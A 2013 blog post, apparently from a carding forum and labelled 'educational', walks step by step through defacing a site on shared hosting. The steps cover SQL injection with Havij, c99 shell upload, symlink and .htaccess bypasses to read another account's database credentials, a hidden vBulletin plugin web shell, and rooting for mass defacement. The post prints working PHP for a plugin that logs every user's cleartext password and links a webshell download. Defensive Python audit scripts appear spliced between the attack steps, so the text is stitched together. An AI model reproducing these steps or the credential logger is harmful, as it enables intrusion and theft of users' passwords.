Sunday, 13 January 2013

Script-kiddies

I. What are script-kiddies and how do they hack (deface)?

A script kiddie or skiddie, occasionally skid, script bunny, script kitty, script-running juvenile (SRJ) or similar, is a derogatory term used to describe those who use scripts or programs developed by others to attack computer systems and networks and deface websites. – Wikipedia (http://en.wikipedia.org/wiki/Script_kiddie)
This article explains the various methods by which script-kiddies and black-hat wannabes deface websites in 2011. It is aimed at security awareness for site owners, hosting administrators and the public of carder.pro. How did your website get defaced? Keep on reading and you will find out.
This is for educational purposes only. You may re-distribute freely without changing my name or the content.


II. Deface statistics

What is a (website) deface?
A website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work of system wannabe black/grey hat hackers, who break into a web server and replace the hosted website with one of their own. – Wikipedia (http://en.wikipedia.org/wiki/Website_defacement). 
After the index page of a website has been replaced with a “deface”, there is a growing trend among script-kiddies to submit their deface to Zone-H (http://www.zone-h.org/), which is the biggest deface archive (maybe this way their e-penis gets bigger?). Zone-H has published a great article/analysis of the defacements in 2010 (http://www.zone-h.org/news/id/4737) which I recommend reading. If you want to see statistics for 2011, visit their statistics page (http://www.zone-h.org/stats/ymd). The peak was in 2010, which means that most attacks occurred then, but we should not forget that attacks against businesses, corporations and others are still ongoing in the background. The big publicity that script-kiddy groups like LulzSec and Anonymous get only reveals to some extent how many attacks are happening every day (with and without defacement).
Overall, why are defacements occurring more and more? Because information is more widely shared, technologies are developed rapidly, and as the security industry continues to grow there is always someone to exploit whatever is new on the market.


III. The “skid” attack

What does one cycle of “a skid attack” look like?
To begin with, script-kiddies love SQLi (SQL injection), especially when they can use automated tools like Havij (http://www.itsecteam.com) to exploit these vulnerabilities. After exploiting a security hole with Havij, they get administrator access through the data in the database. The pre-final step is “raising” a shell; if they have a local kernel exploit for the server they try to get root, and if not, they start defacing one site after another. I am going to discuss the various methods which an attacker such as the “skiddie” can use to deface your website. They are no masters or wizards of security; I am going to prove that to you, as well as how lame they really are.

1. Attack types
There are 3 types of reasons for an attack – targeted, for “reputation”, and a fusion of these two. The first is when you have personal conflicts with the site owner or you don’t like the content; the second is when you mass-deface websites (feeling more 1337, I guess?). I am going to write about the fusion attack: first we target a specific website, after we have defaced it we get root and mass-deface (of course, with an example scenario).

2. Finding our target
Let us presume g00d-f0rum.net is our target, whose content and owner we don’t admire and want to “give a lesson” (for this occasion only, we are the evil script-kiddie).

2.1 Is it on shared hosting?
To check whether our target is “hackable”, we check if there are other domains on the same server:
Domain Tools Reverse IP - http://www.domaintools.com/research/reverse-ip/
Yougetsignal Reverse IP - http://www.yougetsignal.com/tools/we...on-web-server/
Webhosting.info Reverse IP - http://whois.webhosting.info/
and many others…
We are going to use the first one since it is the most accurate of all. We go to the URL and input our target domain (g00d-f0rum.net in our case). The results should look something like this:

[IMG]

2.2 Attacking the shared hosting
It doesn’t take much skill to attack a website on shared hosting. We go to Bing (http://www.bing.com/) and input “ip:TARGETIP”, and all of the websites on that server are listed. How do we find our special SQLi security hole? We add “id=” (or any other dork, but this is the most commonly used one) so that the query is “ip:TARGETIP id=”, and we start checking the results one by one.

[IMG]

Those in red are what the script-kiddie is most likely to “havij” because of their unique/custom URLs (custom-coded PHP = vulnerable in most cases). We have:
csr.php?sub=dir&show=1&company_?id=33
view_news.php?id=144
pressrelease.php?lang=en&?id=00000.txt

We put the first one into Havij and wait for the result… nothing. We input the second one… success! Now that our tool has exploited the vulnerability we click “Get Tables” (we choose a table like admin_users), “Get Columns”, then we choose the columns we want to extract (in our case pass, username, id) and “Get Data”.
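The Havij run described above leaves a recognisable trail in the web server's access log: a quote to provoke an error, a boolean probe, then UNION queries that walk information_schema. The following is an added example for hosting administrators, not code from the original post. It parses a few constructed Apache combined-format log lines (IPs, hosts and timestamps are made up), tags each request with the injection stages it matches, and aggregates per client so a noisy scanner stands out.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines standing in for a shared host's access log;
# the IPs, timestamps and sizes are made up for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Jan/2013:10:01:02 +0000] "GET /view_news.php?id=144 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [13/Jan/2013:10:01:05 +0000] "GET /view_news.php?id=144%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.10 - - [13/Jan/2013:10:01:09 +0000] "GET /view_news.php?id=144+AND+1=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [13/Jan/2013:10:01:12 +0000] "GET /view_news.php?id=-144+UNION+SELECT+1,group_concat(table_name),3+FROM+information_schema.tables-- HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jan/2013:10:02:00 +0000] "GET /pressrelease.php?lang=en&id=00000.txt HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Applied to the URL-decoded query string. The tags name the stages of a
# tool-driven injection: error provocation, boolean probing, schema enumeration.
SQLI_PATTERNS = [
    (re.compile(r"'"), "quote-probe"),
    (re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I), "boolean-probe"),
    (re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I), "union-select"),
    (re.compile(r"\binformation_schema\b", re.I), "schema-enumeration"),
    (re.compile(r"\bgroup_concat\s*\(", re.I), "group_concat"),
    (re.compile(r"(?:--|#)\s*$"), "comment-terminator"),
]


def parse_line(line):
    """Split one combined-log line into ip/path/status plus a decoded query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["path"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query)   # %27 and '+' become what the database saw
    rec["status"] = int(rec["status"])
    return rec


def classify(query):
    """Return the injection tags present in a decoded query string, in rule order."""
    return [tag for pat, tag in SQLI_PATTERNS if pat.search(query)]


def analyse(log_text):
    """One finding per request whose query string carries SQLi markers."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if tags:
            findings.append({"ip": rec["ip"], "path": rec["path"],
                             "status": rec["status"], "tags": tags})
    return findings


def per_ip_summary(findings):
    """Aggregate per client: suspicious request count, distinct tags, 5xx responses."""
    summary = {}
    for f in findings:
        s = summary.setdefault(f["ip"], {"requests": 0, "tags": set(), "errors": 0})
        s["requests"] += 1
        s["tags"].update(f["tags"])
        if f["status"] >= 500:
            s["errors"] += 1
    return summary


if __name__ == "__main__":
    for ip, s in per_ip_summary(analyse(SAMPLE_LOG)).items():
        print(f"{ip}: {s['requests']} suspicious requests, {s['errors']} server errors, "
              f"tags={sorted(s['tags'])}")
```

The quote-probe tag alone is noisy (legitimate search terms contain apostrophes), so treat it as a weak signal; a client that accumulates boolean-probe and schema-enumeration tags within minutes, with 5xx responses in between, is the pattern worth alerting on and blocking at the host level.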

[IMG]

Now the script-kiddie must find the administrator/login page; there are various tools (online ones too) to find it for you (google "online admin page finder" or similar). Assuming that we have found the page, we log in with the credentials we obtained from the SQLi attack.

[IMG]

We upload a c99 shell and now comes the interesting part…

2.3 Attacking our target
We, as the script-kiddie, had set g00d-f0rum.net as our target, remember? We broke into another website on the same server (we knew about it through reverse IP), uploaded a shell (the example path of the shell is /home/example/public_html/content_images/c99.php) and now we are going to hack and deface our victim.

2.3.1 Security problems
Once the c99 shell is uploaded we might see that the host has disabled some functions like phpinfo, system() etc. and that safe_mode is switched ON. These features are put in place as "security", but in the majority of cases they are easily bypassed. One of the easiest ways is to grab the server's php.ini and modify it so that no functions are disabled and safe_mode shows OFF. You can do that by creating a PHP file with the following content:


Now save it as info.php (for example) and open it in your browser. You will see exactly where php.ini is located (/etc/php5/php.ini, for example).

2.3.2 Identifying path of the target in the server
On one server there could be hundreds or even thousands of websites, so to find out which directory g00d-f0rum.net lives in we dump the content of /etc/passwd (there is a button for this in c99, r57 and similar shells if you are a newbie). We search for the first part of the domain, “g00d”, and the result comes up directly: /home/g00df0r/ is the directory we need. Now g00d-f0rum.net (example!) runs vBulletin 4.1.4 (which is patched against the search UI SQLi but not against other vulnerabilities I have found...), and by Googling we know that the configuration file holding the MySQL credentials for its database is /includes/config.php (by default). The vBulletin suite (and most web applications) uses a MySQL database to store usernames, passwords, posts etc. (so that you understand why we need it). Our idea is to break in, get the admin's username and password hash and try cracking it or, even faster, replace the admin e-mail with our own and request a password reset.
Note: In such an attack timing is important. If the admin is online and you do this, you might end his session, which will raise his awareness that something is wrong.
There are various ways to obtain the config.php file; I’m going to list just two of them.

2.3.3 Symlink
In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution. – Wikipedia (http://en.wikipedia.org/wiki/Symbolic_link). If you are not familiar with symlinks I strongly advise you to read that article.
We are going to issue “ln -s” on the default configuration file of vBulletin and put the link into our directory, renamed as a text file (to be viewable). To do that we type the following in the “execute command” box of c99, r57 or whatever shell:


Our shell is in the content_images folder, meaning that if we execute (in the same box in the shell as the previous command)


we will get the content of their configuration file (if it exists). Later in the article I will show you how hackers upload a shell through the vBulletin admin panel.

2.3.4 “Protected” config.php via .htaccess
What if the site owner has placed the following .htaccess in the includes directory?


We try the same attack as above but get a 403 Forbidden when we access g00df0r.txt. Hackers have been creative, and script-kiddies have borrowed their methods and know how to bypass this. We create a directory called “hax” and go to it (via c99 or the shell). We place the following .htaccess in our current directory, /home/example/public_html/content_images/hax:


Now we try the symlink attack again, but this time in the “hax” folder, and we get the configuration file once more. “No security, admin”, as some script-kiddie deface pages say.

2.3.5 Symlink drive-thru
Note: You can name the attack however you like; this name is the most understandable one for me.
The easiest way of all is the symlink drive-thru attack – it doesn’t require much typing, aka script-kiddie friendly. Currently we are in /home/example/public_html/content_images/; we create a directory called “drive-thru” and enter it.
We issue the following command:


Afterwards we put the following .htaccess file in the “drive-thru” directory.


Let’s presume that we have hacked into example-blablabla.com (/home/example/). We made the symlink in /home/example/public_html/content_images/drive-thru, which is http://www.example-blablabla.com/con...es/drive-thru/ . We did a symlink, remember? So it would be example-blablabla.com/content_images/drive-thru/root/ … got the idea? Now it is as easy as navigating in our browser to the file (it is normal to get 403 Forbidden on /home/g00df0r/)
example-blablabla.com/content_images/drive-thru/root/home/g00df0r/public_html/includes and clicking on config.php. But we get a blank page? Yes; we simply view the page source and the MySQL credentials are there.
Next we connect via some MySQL PHP connector and tamper with the database…
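Both symlink variants above (2.3.3 linking straight to another account's config.php, and the drive-thru linking to /) share one property a hosting administrator can audit for: a link inside one account's web root that resolves to a path outside that account. The .htaccess bypasses in 2.3.4 likewise come down to a per-directory file re-enabling symlink following or changing how .php files are served. The following is an added example, not code from the original post, that builds a constructed two-account tree mirroring this scenario in a temporary directory and audits the attacker-side account; the baseline it assumes is a server that relies on SymLinksIfOwnerMatch and the PHP handler to keep source files from being served as text.

```python
import os
import re
import tempfile
from pathlib import Path

# .htaccess directives a hosting account should not be allowed to set (assumed baseline:
# the server depends on SymLinksIfOwnerMatch and on .php always reaching the PHP handler).
RISKY_HTACCESS = [
    (re.compile(r"^\s*Options\b.*\bFollowSymLinks\b", re.I | re.M), "re-enables symlink following"),
    (re.compile(r"^\s*(?:AddType|AddHandler|SetHandler|RemoveHandler|ForceType)\b.*\.php", re.I | re.M),
     "changes how .php files are served"),
]


def audit_account(home):
    """Walk one hosting account; flag symlinks resolving outside it and risky .htaccess files."""
    home = Path(home).resolve()
    findings = []
    for root, dirs, files in os.walk(home):          # followlinks=False: never descend into links
        for name in dirs + files:
            p = Path(root) / name
            if p.is_symlink():
                target = p.resolve()                  # non-strict, so dangling links still resolve
                try:
                    target.relative_to(home)          # inside the account: acceptable
                except ValueError:
                    findings.append(("symlink-escape", str(p), os.readlink(p)))
            elif name == ".htaccess" and p.is_file():
                text = p.read_text(errors="replace")
                for pat, why in RISKY_HTACCESS:
                    if pat.search(text):
                        findings.append(("htaccess", str(p), why))
    return findings


def build_demo():
    """Constructed two-account tree mirroring the post's scenario; returns the attacker-side account."""
    base = Path(tempfile.mkdtemp(prefix="shared-host-"))
    victim_inc = base / "g00df0r" / "public_html" / "includes"
    victim_inc.mkdir(parents=True)
    (victim_inc / "config.php").write_text("<?php // constructed placeholder, no real credentials\n")
    images = base / "example" / "public_html" / "content_images"
    drive = images / "drive-thru"
    drive.mkdir(parents=True)
    (images / "logo.png").write_bytes(b"\x89PNG")
    os.symlink(images / "logo.png", images / "logo-copy.png")       # stays inside the account: fine
    os.symlink(victim_inc / "config.php", images / "g00df0r.txt")    # 2.3.3: link into another account
    os.symlink("/", drive / "root")                                   # 2.3.5: link to the filesystem root
    (drive / ".htaccess").write_text("Options +FollowSymLinks\n")    # per-directory override
    return base / "example"


if __name__ == "__main__":
    for kind, path, detail in audit_account(build_demo()):
        print(f"{kind:15} {path}  ({detail})")
```

Run it across /home/* from cron and page on any symlink-escape finding; the benign in-account link is deliberately not reported so the output stays actionable. Note that the audit reads the link target without following it, so a link to / is reported as the three-character target "/" rather than by walking the whole filesystem.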

2.4 Getting a shell on our target
Let us presume that we have a vBulletin installation on g00d-f0rum.net. To gain administrator access we crack the hash of the admin or we replace his e-mail with ours and reset the password (as said above). Either way we know the administrator username and password, so the next thing we have to do is log into the admin panel, which by default is g00d-f0rum.net/admincp (or you can try exploring folders via the symlink drive-thru method).
Now the question which comes to the script-kiddie is “How do I upload a shell that isn’t visible (without tampering with templates)?”. Apparently they have leeched a way for this from someone as well – via webshell 2.0 (check the download link in Reference/Interesting). You can scan it at VirusTotal or wherever you wish; it’s clean.
Open cmd.txt and copy its content WITHOUT the PHP tags, then go to “Plugins and Products” (admincp) -> Add New Plugin and fill in as it says:


You have probably already guessed what to do next, but either way I am going to explain. Open up WebShellv2.exe, in “WebShell URL” put (as in our example) http://www.g00d-f0rum.net/ajax.php and blank out the “WebShell Source URL” box.
Note: Why ajax.php? Because of the hook location we have specified, ajax_complete.
Next you hit “Run WebShell” and you have a remote shell without anyone knowing, because if you browse to http://www.g00d-f0rum.net/ajax.php you will get a blank page on your screen. Then you just deface.

2.5 “Additional evilness”
What more could the script-kiddies do? Well, instead of cracking the passwords one by one they could leave a backdoor which logs all users' credentials in clear text, which would lead to “hacking” and abuse of the e-mails and of the users themselves.
(Author: DeCrew, http://r00tsecurity.org/forums/topic...g-via-plugins/)
You'll have to add two plugins through the vBulletin admin panel.

First Plugin:


Second Plugin:

Hook Location: login_process
Execution order: 5
Plugin PHP Code:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./includes/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
    {
        // append "username : password (email)" to lg.html
        $fp1 = @fopen($lg_file, "a+");
        @fwrite($fp1, $lg_username . ' : ' . $lg_password . " (" . $row["email"] . ")\n");
        @fclose($fp1);
        // rewrite the file without duplicate lines
        $f = @file($lg_file);
        $new = array_unique($f);
        $fp = @fopen($lg_file, "w");
        foreach($new as $values)
        {
            @fputs($fp, $values);
        }
        @fclose($fp);
    }
}
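The two plugin-based backdoors in 2.4 and 2.5 (a shell hung on ajax_complete, a credential logger on login_process) live entirely in the database, so a file-integrity check of the vBulletin tree never sees them. A forum administrator can instead audit the plugin rows themselves. The following is an added example, not code from the original post or from vBulletin: it runs a set of regex rules over constructed plugin rows shaped like the columns of vBulletin's plugin table (pluginid, title, hookname, phpcode, active; column names assumed from memory, adjust to your version) and grades each one. The second constructed row is a condensed version of the logger shown above; the third stands in for an obfuscated payload with a placeholder string.

```python
import re

# Detection rules over the PHP body of each plugin; tags are combined into reasons below.
RULES = [
    ("password-access", re.compile(r"vb_login_password", re.I)),
    ("file-write", re.compile(r"\b(?:fopen|fwrite|fputs|file_put_contents|mail)\s*\(", re.I)),
    ("code-exec", re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I)),
    ("obfuscation", re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("os-command", re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)),
    ("request-input", re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")),
    ("error-suppression", re.compile(r"@\s*[A-Za-z_]\w*\s*\(")),
]

# Hooks that deserve extra suspicion, both named in the post: login_process sees the
# cleartext password, ajax_complete runs on a request whose page renders blank.
CREDENTIAL_HOOKS = {"login_process"}
QUIET_HOOKS = {"ajax_complete"}

# Constructed sample rows; only the shape of vBulletin's plugin table is assumed.
SAMPLE_PLUGINS = [
    {"pluginid": 1, "title": "Show banner", "hookname": "global_start", "active": 1,
     "phpcode": "$show['sponsor_banner'] = true;"},
    {"pluginid": 2, "title": "Cache warmup", "hookname": "login_process", "active": 1,
     "phpcode": ('$u = strtolower($vbulletin->GPC["vb_login_username"]);\n'
                 '$p = $vbulletin->GPC["vb_login_password"];\n'
                 '$fp = @fopen("./includes/lg.html", "a+");\n'
                 '@fwrite($fp, $u . " : " . $p . "\\n"); @fclose($fp);')},
    {"pluginid": 3, "title": "Ajax helper", "hookname": "ajax_complete", "active": 1,
     "phpcode": "eval(gzinflate(base64_decode('PLACEHOLDER')));"},
]


def audit_plugin(row):
    """Grade one plugin row: 'clean', 'review' (isolated hits) or 'high' (a combination)."""
    hits = [tag for tag, pat in RULES if pat.search(row["phpcode"])]
    reasons = []
    if "password-access" in hits and ("file-write" in hits or "os-command" in hits):
        reasons.append("reads the submitted password and writes it out (credential logger)")
    elif row["hookname"] in CREDENTIAL_HOOKS and "file-write" in hits:
        reasons.append("writes to a file from a hook that handles logins")
    if "code-exec" in hits and ("obfuscation" in hits or "request-input" in hits):
        reasons.append("executes obfuscated or request-supplied code (backdoor)")
    if "os-command" in hits and "request-input" in hits:
        reasons.append("runs OS commands from request parameters (web shell)")
    if row["hookname"] in QUIET_HOOKS and ("code-exec" in hits or "os-command" in hits):
        reasons.append("executes code from a hook whose page renders blank")
    severity = "high" if reasons else ("review" if hits else "clean")
    return {"pluginid": row["pluginid"], "title": row["title"], "hookname": row["hookname"],
            "severity": severity, "hits": hits, "reasons": reasons}


def audit_all(rows):
    return [audit_plugin(r) for r in rows]


if __name__ == "__main__":
    for r in audit_all(SAMPLE_PLUGINS):
        print(f"#{r['pluginid']} {r['title']!r} on {r['hookname']}: {r['severity']}")
        for reason in r["reasons"]:
            print("    -", reason)
```

Feed it the rows from the live database (including inactive plugins, since a disabled backdoor is still an indicator) and compare the pluginid list against the products you actually installed; a plugin whose title sounds routine but whose hook is login_process deserves a read regardless of the grade.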

2.6 Rooting and mass deface
If the output of “uname -a” doesn’t match any kernel exploit in the collection the skids have downloaded from the Internet, they simply give up. But if they have the right exploit, they do not hesitate to use it and get root. Then they launch something similar to mass.pl (see the download in Reference/Interesting) and submit the mass deface to Zone-H again. In other articles I will show you how to root step by step.
Note: There is an "Auto-rooter 2011" by r00tworm. I haven't checked it out yet but it seems legit; of course, always deal with caution.


IV. Counter-measures
Since attacks such as those above have been happening for years now, hosting providers should already apply appropriate security on their shared hosting servers. Many things can be applied, such as open_basedir in PHP, suPHP, disabling unused PHP functions and setting a global php.ini that can’t be overridden, but they still aren't enough.

The counter-measure I would like to show web hosting companies is CloudLinux (http://cloudlinux.com/). There is no need to copy and paste what CloudLinux does; better just visit their website.
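The php.ini side of the counter-measures listed above (and of the safe_mode/disable_functions bypass in 2.3.1) is easy to get half right: a host disables phpinfo but leaves system() callable, or relies on safe_mode, which never was a security boundary and was removed in PHP 5.4. The following is an added example for hosting administrators, not code from the original post, that parses two constructed php.ini excerpts (a weak one and a hardened one; the MUST_DISABLE baseline is an assumption to adjust per host) and reports what falls short.

```python
# Constructed php.ini excerpts, not from the post. The weak one mirrors the state the
# post describes (functions disabled half-heartedly, safe_mode relied upon).
WEAK_INI = """\
[PHP]
engine = On
safe_mode = On
disable_functions = phpinfo
open_basedir =
allow_url_include = On
expose_php = On
display_errors = On
"""

HARDENED_INI = """\
[PHP]
engine = On
disable_functions = system, exec, shell_exec, passthru, popen, proc_open, symlink, dl
open_basedir = "/home/example/:/tmp/"
allow_url_include = Off
expose_php = Off
display_errors = Off
"""

# Assumed baseline: functions that let a script run commands or create links and so
# leave its own document root. Extend per host (e.g. dl, pcntl_*).
MUST_DISABLE = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open", "symlink"}


def parse_ini(text):
    """Minimal php.ini reader: 'key = value' lines, ';' comments, [sections] ignored."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    return value.strip().lower() in ("on", "1", "true", "yes")


def check(settings):
    """Return human-readable findings; an empty list means the baseline is met."""
    findings = []
    disabled = {f.strip().lower() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(MUST_DISABLE - disabled)
    if missing:
        findings.append("disable_functions still allows: " + ", ".join(missing))
    if not settings.get("open_basedir"):
        findings.append("open_basedir is empty: scripts may read any path the web server user can")
    for key in ("allow_url_include", "expose_php", "display_errors"):
        if is_on(settings.get(key, "")):
            findings.append(f"{key} is On")
    if is_on(settings.get("safe_mode", "")):
        findings.append("safe_mode is relied on; it is not a security boundary and was removed in PHP 5.4")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label + ":", check(parse_ini(text)) or ["ok"])
```

Run it against the php.ini each SAPI actually loads (php --ini shows the path for the CLI; a phpinfo() page shows it for the web SAPI), because under CGI/suPHP a php.ini dropped in a script's own directory can replace the global one, which is exactly why the post insists on a global file that cannot be overridden. The reader splits on every ";", so values that legitimately contain one (open_basedir on Windows) need a smarter parser.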


V. Reference/Interesting
http://en.wikipedia.org/wiki/Script_kiddie
http://en.wikipedia.org/wiki/Website_defacement
http://www.zone-h.org/news/id/4737
http://www.itsecteam.com
http://www.domaintools.com/research/reverse-ip/
http://www.yougetsignal.com/tools/we...on-web-server/
http://whois.webhosting.info/
http://www.bing.com/
http://en.wikipedia.org/wiki/Symbolic_link
http://r00tsecurity.org/forums/topic...g-via-plugins/
Mass.pl and webshell (password:carder.pro) - http://www.mediafire.com/?086ib535d01q5rf

I would be grateful if you leave feedback! Also, can someone translate this to Russian and post it in the appropriate section? Thank you in advance.
